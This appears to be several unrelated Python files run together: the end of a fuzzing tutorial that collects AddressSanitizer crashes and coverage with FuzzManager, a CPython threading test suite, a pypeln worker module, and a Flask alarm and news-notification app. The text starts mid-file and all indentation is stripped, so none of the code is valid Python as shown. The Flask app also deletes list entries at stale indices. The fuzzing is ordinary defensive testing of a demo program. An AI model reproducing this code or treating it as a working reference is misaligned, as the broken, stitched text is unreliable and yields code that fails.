if __name__ == '__main__':
print('\n### End of Excursion')
### Logging In
if __name__ == '__main__':
print('\n### Logging In')
if __name__ == '__main__':
fuzzmanager_url = "http://127.0.0.1:8000"
if __name__ == '__main__':
from IPython.display import display, Image
from .bookutils import HTML, rich_output
from .GUIFuzzer import start_webdriver # minor dependency
if __name__ == '__main__':
gui_driver = start_webdriver(headless=True, zoom=1.2)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 600)
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
username = gui_driver.find_element_by_name("username")
username.send_keys("demo")
if __name__ == '__main__':
password = gui_driver.find_element_by_name("password")
password.send_keys("demo")
if __name__ == '__main__':
login = gui_driver.find_element_by_tag_name("button")
login.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Collecting Crashes
## ------------------
if __name__ == '__main__':
print('\n## Collecting Crashes')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/choller/simply-buggy')
if __name__ == '__main__':
import os
os.system(f'(cd simply-buggy && make)')
from .bookutils import print_file
if __name__ == '__main__':
print_file("simply-buggy/simple-crash.cpp")
if __name__ == '__main__':
print_file("simply-buggy/simple-crash.fuzzmanagerconf", lexer=IniLexer())
if __name__ == '__main__':
import os
os.system(f'simply-buggy/simple-crash')
import subprocess
if __name__ == '__main__':
cmd = ["simply-buggy/simple-crash"]
if __name__ == '__main__':
result = subprocess.run(cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Yay, we crashed!")
else:
print("Move along, nothing to see...")
### Program Configurations
if __name__ == '__main__':
print('\n### Program Configurations')
if __name__ == '__main__':
sys.path.append('FuzzManager')
if __name__ == '__main__':
from FTB.ProgramConfiguration import ProgramConfiguration
if __name__ == '__main__':
configuration = ProgramConfiguration.fromBinary('simply-buggy/simple-crash')
(configuration.product, configuration.platform)
### Crash Info
if __name__ == '__main__':
print('\n### Crash Info')
if __name__ == '__main__':
from FTB.Signatures.CrashInfo import CrashInfo
if __name__ == '__main__':
cmd = ["simply-buggy/simple-crash"]
result = subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if __name__ == '__main__':
stderr = result.stderr.decode().splitlines()
stderr[0:3]
if __name__ == '__main__':
stdout = result.stdout.decode().splitlines()
stdout
if __name__ == '__main__':
crashInfo = CrashInfo.fromRawCrashData(stdout, stderr, configuration)
print(crashInfo)
### Collector
if __name__ == '__main__':
print('\n### Collector')
if __name__ == '__main__':
from Collector.Collector import Collector
if __name__ == '__main__':
collector = Collector()
if __name__ == '__main__':
collector.submit(crashInfo)
### Inspecting Crashes
if __name__ == '__main__':
print('\n### Inspecting Crashes')
if __name__ == '__main__':
gui_driver.refresh()
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
crash = gui_driver.find_element_by_xpath('//td/a[contains(@href,"/crashmanager/crashes/")]')
crash.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Crash Buckets
## -------------
if __name__ == '__main__':
print('\n## Crash Buckets')
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
create = gui_driver.find_element_by_xpath('//a[contains(@href,"/signatures/new/")]')
create.click()
time.sleep(1)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 1200)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
save = gui_driver.find_element_by_name("submit_save")
save.click()
time.sleep(1)
### Crash Signatures
if __name__ == '__main__':
print('\n### Crash Signatures')
if __name__ == '__main__':
gui_driver.set_window_size(1400, 800)
Image(gui_driver.get_screenshot_as_png())
### Coarse-Grained Signatures
if __name__ == '__main__':
print('\n### Coarse-Grained Signatures')
if __name__ == '__main__':
print_file("simply-buggy/out-of-bounds.cpp")
import os
import random
import subprocess
import tempfile
import sys
#### Excursion: `escapelines()` implementatipn
if __name__ == '__main__':
print('\n#### Excursion: `escapelines()` implementatipn')
def isascii(s):
return all([0 <= ord(c) <= 127 for c in s])
if __name__ == '__main__':
isascii('Hello,')
def escapelines(bytes):
def ascii_chr(byte):
if 0 <= byte <= 127:
return chr(byte)
return r"\x%02x" % byte
def unicode_escape(line):
ret = "".join(map(ascii_chr, line))
assert isascii(ret)
return ret
return [unicode_escape(line) for line in bytes.splitlines()]
if __name__ == '__main__':
escapelines(b"Hello,\nworld!")
if __name__ == '__main__':
escapelines(b"abc\xffABC")
#### End of Excursion
if __name__ == '__main__':
print('\n#### End of Excursion')
if __name__ == '__main__':
cmd = ["simply-buggy/out-of-bounds"]
# Connect to crash server
collector = Collector()
random.seed(2048)
crash_count = 0
TRIALS = 20
for itnum in range(0, TRIALS):
rand_len = random.randint(1, 1024)
rand_data = bytes([random.randrange(0, 256) for i in range(rand_len)])
(fd, current_file) = tempfile.mkstemp(prefix="fuzztest", text=True)
os.write(fd, rand_data)
os.close(fd)
current_cmd = []
current_cmd.extend(cmd)
current_cmd.append(current_file)
result = subprocess.run(current_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout = [] # escapelines(result.stdout)
stderr = escapelines(result.stderr)
crashed = False
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
print(itnum, end=" ")
if crashed:
sys.stdout.write("(Crash) ")
# This reads the simple-crash.fuzzmanagerconf file
configuration = ProgramConfiguration.fromBinary(cmd[0])
# This reads and parses our ASan trace into a more generic format,
# returning us a generic "CrashInfo" object that we can inspect
# and/or submit to the server.
crashInfo = CrashInfo.fromRawCrashData(stdout, stderr, configuration)
# Submit the crash
collector.submit(crashInfo, testCase = current_file)
crash_count += 1
os.remove(current_file)
print("")
print("Done, submitted %d crashes after %d runs." % (crash_count, TRIALS))
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url + "/crashmanager/crashes")
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
## Collecting Code Coverage
## ------------------------
if __name__ == '__main__':
print('\n## Collecting Code Coverage')
if __name__ == '__main__':
print_file("simply-buggy/maze.cpp")
if __name__ == '__main__':
import os
os.system(f'(cd simply-buggy && make clean && make coverage)')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/choller/simply-buggy $HOME/simply-buggy-server ')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python3 server/manage.py setup_repository simply-buggy GITSourceCodeProvider $HOME/simply-buggy-server')
import random
import subprocess
if __name__ == '__main__':
random.seed(0)
cmd = ["simply-buggy/maze"]
constants = [3735928559, 1111638594]
TRIALS = 1000
for itnum in range(0, TRIALS):
current_cmd = []
current_cmd.extend(cmd)
for _ in range(0, 4):
if random.randint(0, 9) < 3:
current_cmd.append(str(constants[
random.randint(0, len(constants) - 1)]))
else:
current_cmd.append(str(random.randint(-2147483647, 2147483647)))
result = subprocess.run(current_cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
if stderr and "secret" in stderr[0]:
print(stderr[0])
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Found the bug!")
break
print("Done!")
if __name__ == '__main__':
import os
os.system(f'export PATH=$HOME/.cargo/bin:$PATH; grcov simply-buggy/ -t coveralls+ --commit-sha $(cd simply-buggy && git rev-parse HEAD) --token NONE -p `pwd`/simply-buggy/ > coverage.json')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python3 -mCovReporter --repository simply-buggy --description "Test1" --submit ../coverage.json')
if __name__ == '__main__':
gui_driver.get(fuzzmanager_url + "/covmanager")
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
first_id = gui_driver.find_element_by_xpath('//td/a[contains(@href,"/browse")]')
first_id.click()
time.sleep(1)
if __name__ == '__main__':
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
maze_cpp = gui_driver.find_element_by_xpath("//*[contains(text(), 'maze.cpp')]")
maze_cpp.click()
time.sleep(1)
if __name__ == '__main__':
gui_driver.set_window_size(1400, 1400)
Image(gui_driver.get_screenshot_as_png())
if __name__ == '__main__':
random.seed(0)
cmd = ["simply-buggy/maze"]
# Added the missing constant here
constants = [3735928559, 1111638594, 3405695742]
for itnum in range(0,1000):
current_cmd = []
current_cmd.extend(cmd)
for _ in range(0,4):
if random.randint(0, 9) < 3:
current_cmd.append(str(
constants[random.randint(0, len(constants) - 1)]))
else:
current_cmd.append(str(random.randint(-2147483647, 2147483647)))
result = subprocess.run(current_cmd, stderr=subprocess.PIPE)
stderr = result.stderr.decode().splitlines()
crashed = False
if stderr:
print(stderr[0])
for line in stderr:
if "ERROR: AddressSanitizer" in line:
crashed = True
break
if crashed:
print("Found the bug!")
break
print("Done!")
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
if __name__ == '__main__':
fuzzmanager_process.terminate()
if __name__ == '__main__':
gui_driver.quit()
import shutil
if __name__ == '__main__':
for temp_file in ['coverage.json', 'geckodriver.log', 'ghostdriver.log']:
if os.path.exists(temp_file):
os.remove(temp_file)
if __name__ == '__main__':
home = os.path.expanduser("~")
for temp_dir in ['coverage', 'simply-buggy', 'simply-buggy-server',
os.path.join(home, 'simply-buggy-server'),
'FuzzManager']:
if os.path.exists(temp_dir):
shutil.rmtree(temp_dir)
## Next Steps
## ----------
if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
## Exercises
## ---------
if __name__ == '__main__':
print('\n## Exercises')
### Exercise 1: Automatic Crash Reporting
if __name__ == '__main__':
print('\n### Exercise 1: Automatic Crash Reporting')
|
test_threading.py
|
# Very rudimentary test of threading module
import test.support
from test.support import verbose
import random
import re
import sys
import threading
import _thread
import time
import unittest
import weakref
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assert_(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.failUnlessEqual(t.ident, None)
self.assert_(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.is_alive())
self.failIfEqual(t.ident, 0)
self.assert_(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
if verbose:
print('platform does not support changing thread stack size')
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
if verbose:
print('platform does not support changing thread stack size')
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Acquiring an RLock forces an entry for the foreign
# thread to get made in the threading._active map.
r = threading.RLock()
r.acquire()
r.release()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print("test_PyThreadState_SetAsyncExc can't import ctypes")
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = _thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
worker_started.wait()
if verbose:
print(" verifying worker hasn't exited")
self.assert_(not t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""])
self.failIf(rc == 2, "interpreted was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in range(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEquals(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEquals(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
class ThreadJoinOnShutdown(unittest.TestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
' due to known OS bugs on'), sys.platform
return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
class ThreadingExceptionTests(unittest.TestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_releasing_unacquired_rlock(self):
rlock = threading.RLock()
self.assertRaises(RuntimeError, rlock.release)
def test_waiting_on_unacquired_condition(self):
cond = threading.Condition()
self.assertRaises(RuntimeError, cond.wait)
def test_notify_on_unacquired_condition(self):
cond = threading.Condition()
self.assertRaises(RuntimeError, cond.notify)
def test_semaphore_with_negative_value(self):
self.assertRaises(ValueError, threading.Semaphore, value = -1)
self.assertRaises(ValueError, threading.Semaphore, value = -sys.maxsize)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_main():
test.support.run_unittest(ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
worker.py
|
import abc
from copy import copy
from dataclasses import dataclass, field
import functools
import multiprocessing
from multiprocessing import synchronize
import threading
import time
import typing as tp
import stopit
from pypeln import utils as pypeln_utils
from . import utils
from .queue import IterableQueue, OutputQueues
WorkerConstructor = tp.Callable[[int, "StageParams", IterableQueue], "Worker"]
Kwargs = tp.Dict[str, tp.Any]
T = tp.TypeVar("T")
class ProcessFn(pypeln_utils.Protocol):
def __call__(self, worker: "Worker", **kwargs):
...
class StageParams(tp.NamedTuple):
input_queue: IterableQueue
output_queues: OutputQueues
namespace: utils.Namespace
@classmethod
def create(
cls, input_queue: IterableQueue, output_queues: OutputQueues, total_workers: int
) -> "StageParams":
return cls(
namespace=utils.Namespace(active_workers=total_workers),
input_queue=input_queue,
output_queues=output_queues,
)
def worker_done(self):
with self.namespace:
self.namespace.active_workers -= 1
class WorkerInfo(tp.NamedTuple):
index: int
@dataclass
class Worker(tp.Generic[T]):
process_fn: ProcessFn
index: int
timeout: float
stage_params: StageParams
main_queue: IterableQueue
on_start: tp.Optional[tp.Callable[..., Kwargs]]
on_done: tp.Optional[tp.Callable[..., Kwargs]]
use_threads: bool
f_args: tp.List[str]
namespace: utils.Namespace = field(
default_factory=lambda: utils.Namespace(done=False, task_start_time=None)
)
process: tp.Optional[tp.Union[multiprocessing.Process, threading.Thread]] = None
def __call__(self):
worker_info = WorkerInfo(index=self.index)
on_start_args: tp.List[str] = (
pypeln_utils.function_args(self.on_start) if self.on_start else []
)
on_done_args: tp.List[str] = (
pypeln_utils.function_args(self.on_done) if self.on_done else []
)
try:
if self.on_start is not None:
on_start_kwargs = dict(worker_info=worker_info)
kwargs = self.on_start(
**{
key: value
for key, value in on_start_kwargs.items()
if key in on_start_args
}
)
else:
kwargs = {}
if kwargs is None:
kwargs = {}
kwargs.setdefault("worker_info", worker_info)
self.process_fn(
self,
**{key: value for key, value in kwargs.items() if key in self.f_args},
)
self.stage_params.worker_done()
if self.on_done is not None:
kwargs.setdefault(
"stage_status",
StageStatus(
namespace=self.stage_params.namespace,
),
)
self.on_done(
**{
key: value
for key, value in kwargs.items()
if key in on_done_args
}
)
self.stage_params.output_queues.worker_done()
except pypeln_utils.StopThreadException:
pass
except BaseException as e:
self.main_queue.raise_exception(e)
time.sleep(0.01)
finally:
self.done()
def start(self):
[self.process] = start_workers(self, use_threads=self.use_threads)
def stop(self):
if self.process is None:
return
if not self.process.is_alive():
return
if isinstance(self.process, multiprocessing.Process):
self.process.terminate()
else:
stopit.async_raise(
self.process.ident,
pypeln_utils.StopThreadException,
)
self.namespace.task_start_time = None
def done(self):
self.namespace.done = True
def did_timeout(self):
task_start_time = self.namespace.task_start_time
done = self.namespace.done
return (
self.timeout
and not done
and task_start_time is not None
and (time.time() - task_start_time > self.timeout)
)
@dataclass
class MeasureTaskTime:
worker: "Worker"
def __enter__(self):
self.worker.namespace.task_start_time = time.time()
def __exit__(self, *args):
self.worker.namespace.task_start_time = None
def measure_task_time(self):
return self.MeasureTaskTime(self)
class Applicable(pypeln_utils.Protocol):
def apply(self, worker: "Worker", elem: tp.Any, **kwargs):
...
class ApplyProcess(ProcessFn, Applicable):
def __call__(self, worker: Worker, **kwargs):
for elem in worker.stage_params.input_queue:
with worker.measure_task_time():
self.apply(worker, elem, **kwargs)
class StageStatus:
"""
Object passed to various `on_done` callbacks. It contains information about the stage in case book keeping is needed.
"""
def __init__(self, namespace):
self._namespace = namespace
@property
def done(self) -> bool:
"""
`bool` : `True` if all workers finished.
"""
return self._namespace.active_workers == 0
@property
def active_workers(self):
"""
`int` : Number of active workers.
"""
return self._namespace.active_workers
def __str__(self):
return (
f"StageStatus(done = {self.done}, active_workers = {self.active_workers})"
)
# ----------------------------------------------------------------
# create_daemon_workers
# ----------------------------------------------------------------
def start_workers(
target: tp.Callable,
n_workers: int = 1,
args: tp.Tuple[tp.Any, ...] = tuple(),
kwargs: tp.Optional[tp.Dict[tp.Any, tp.Any]] = None,
use_threads: bool = False,
) -> tp.Union[tp.List[multiprocessing.Process], tp.List[threading.Thread]]:
if kwargs is None:
kwargs = {}
workers = []
for _ in range(n_workers):
if use_threads:
t = threading.Thread(target=target, args=args, kwargs=kwargs)
else:
t = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
workers.append(t)
return workers
|
main.py
|
from flask import render_template
from flask import Flask
from flask import request
from pyowm.owm import OWM
import requests
import time
import sched
import datetime
from uk_covid19 import Cov19API
import threading
import pyttsx3
import json
import os
app= Flask(__name__,template_folder='template')
@app.route('/index')
def index():
"""Inside this function are functions called that are needed in the app route,
this function returns the render template"""
close_notif()
get_time()
update_label()
return render_template("index.html",title="Daily Update",notifications=listfornotification,alarms=listforalarm,image="alarm.png" )
listfornotification=[{'title':'','content':''}]
listforalarm=[{'title':'','content':''}]
"""So the Alarm and Notification list don't return and empty element in the list """
listfornotification=[]
listforalarm=[]
"""To find the number of elements in the Alarm and Notification list for deletion"""
a=len(listforalarm)
n=len(listfornotification)
def weather():
"""Opens Config file to get information useful to this function"""
script_dir=os.path.dirname(__file__)
relative='/config.json'
combined_file_path=script_dir+relative
with open(combined_file_path,'r') as config:
data=json.load(config)
"""Returns Notification list with contents of The Weather Update"""
owm = OWM(data['APIWEATHERNEWS'])
mgr = owm.weather_manager()
location=data['WEATHERLOCATION'] #location is here
observation = mgr.weather_at_place(location) #observation object is a box containing a weather object
weather = observation.weather
status=weather.detailed_status #detailed status
temperature = weather.temperature('celsius')#temperature in Celsius
finaltemp=(str(int(temperature['temp'])))#gets temp alone from the list and converts it to a string
final='The temperature today in '+location+' is ' + finaltemp+'°C' ' and today will have ' + status#cleans up the final output
return listfornotification.append({'title':"Weather Update",'content':final})
def tts_request(announcement):
engine = pyttsx3.init()
engine.say(announcement)
engine.runAndWait()
return "Hello text-to-speech example"
def close_notif():
close_notifs=request.args.get('notif')
if close_notifs:
del listfornotification[n]
def covid_update():
script_dir=os.path.dirname(__file__)
relative='/config.json'
combined_file_path=script_dir+relative
with open(combined_file_path,'r') as config:
data=json.load(config)
Area=[
'areaName=Exeter'
]
cases_and_deaths = {
"date": "date",
"areaName": "areaName",
"areaCode": "areaCode",
"newCasesByPublishDate": "newCasesByPublishDate",
"cumCasesByPublishDate": "cumCasesByPublishDate",
"newDeathsByDeathDate": "newDeathsByDeathDate",
"cumDeathsByDeathDate": "cumDeathsByDeathDate"
}
apiforarea = Cov19API(
filters=Area,
structure=cases_and_deaths,
latest_by="newCasesByPublishDate"
)
Areadata= apiforarea.get_json()
finalAreadata=Areadata['data']
newcasesbydate=finalAreadata[0]['newCasesByPublishDate']
newcasestotal=finalAreadata[0]['cumCasesByPublishDate']
newseathstoday=finalAreadata[0]['newDeathsByDeathDate']
totaldeath=finalAreadata[0]['cumDeathsByDeathDate']
strnewcasesbydate=str(newcasesbydate)
strnewcasestotal=str(newcasestotal)
strnewdeathstoday=str(newseathstoday)
strtotaldeath=str(totaldeath)
finalcovid=("In your area there has been "+ strnewcasesbydate +" cases, and a total of "+ strnewcasestotal + " new cases. For deaths there have been "+strnewdeathstoday+" today, and in total there have been "+strtotaldeath+".")
return listfornotification.append({'title':"Covid Update",'content':finalcovid})
def news():
script_dir=os.path.dirname(__file__)
relative='/config.json'
combined_file_path=script_dir+relative
with open(combined_file_path,'r') as config:
data=json.load(config)
API_KEY = data['APIKEYNEWS']
params = {'q': 'corona virus','source': 'bbc-news','sortBy': 'top','language': 'en',}
headers = {'X-Api-Key': API_KEY}
url = 'https://newsapi.org/v2/top-headlines'
response = requests.get(url, params=params, headers=headers)
responsedata = response.json()
article = responsedata["articles"]
results = [arr["title"] for arr in article]
finalresults=((results[1]),results[2],results[3],results[4],results[5],results[6])
resultsinline=(" ☞ ".join(finalresults))
return listfornotification.append({'title':"Top Headlines",'content':resultsinline})
def clock():
yearnow=str(datetime.datetime.now().year)
monthnow=str(datetime.datetime.now().month).zfill(2)
datenow=str(datetime.datetime.now().day)
hournow=str(datetime.datetime.now().hour).zfill(2)
minutenow=str(datetime.datetime.now().minute).zfill(2)
fulldatenow="0"+datenow+"-"+monthnow+"-"+yearnow+" at "+hournow+":"+minutenow
return('You have an alarm set for '+fulldatenow)
def notif_update():
if str(datetime.datetime.now().minute).zfill(2)=="59":
news()
weather()
def get_time():
alarm_time=request.args.get('alarm')
close=request.args.get('alarm_item')
label=update_label()
while alarm_time:
news_inc=news_inc=request.args.get('news')
weather_inc=weather_inc=request.args.get('weather')
year=alarm_time[0]+alarm_time[1]+alarm_time[2]+alarm_time[3]
month=alarm_time[5]+alarm_time[6]
date=alarm_time[8]+alarm_time[9]
hour=alarm_time[11]+alarm_time[12]
minute=alarm_time[14]+alarm_time[15]
fulldate=date+"-"+month+"-"+year+" at "+hour+":"+minute
if alarm_time and not news_inc and not weather_inc:
return listforalarm.append({'title':label,'content':'You have an alarm set for '+fulldate})
if alarm_time and news_inc and not weather_inc:
return listforalarm.append({'title':label,'content':'You have an alarm set for '+fulldate+" with "+news_inc})
if alarm_time and weather_inc and not news_inc:
return listforalarm.append({'title':label,'content':'You have an alarm set for '+fulldate+" with "+weather_inc})
if alarm_time and news_inc and weather_inc:
return listforalarm.append({'title':label,'content':'You have an alarm set for '+fulldate+" with "+news_inc+" and "+weather_inc})
else:
if close:
del listforalarm[a]
def do_alarm():
if clock()==listforalarm[0]['content']:
covid_update()
tts_request("You have an Alarm Update")
del listforalarm[0]
if clock()+" with news"==listforalarm[0]['content']:
news()
covid_update()
tts_request("You have an Alarm Update")
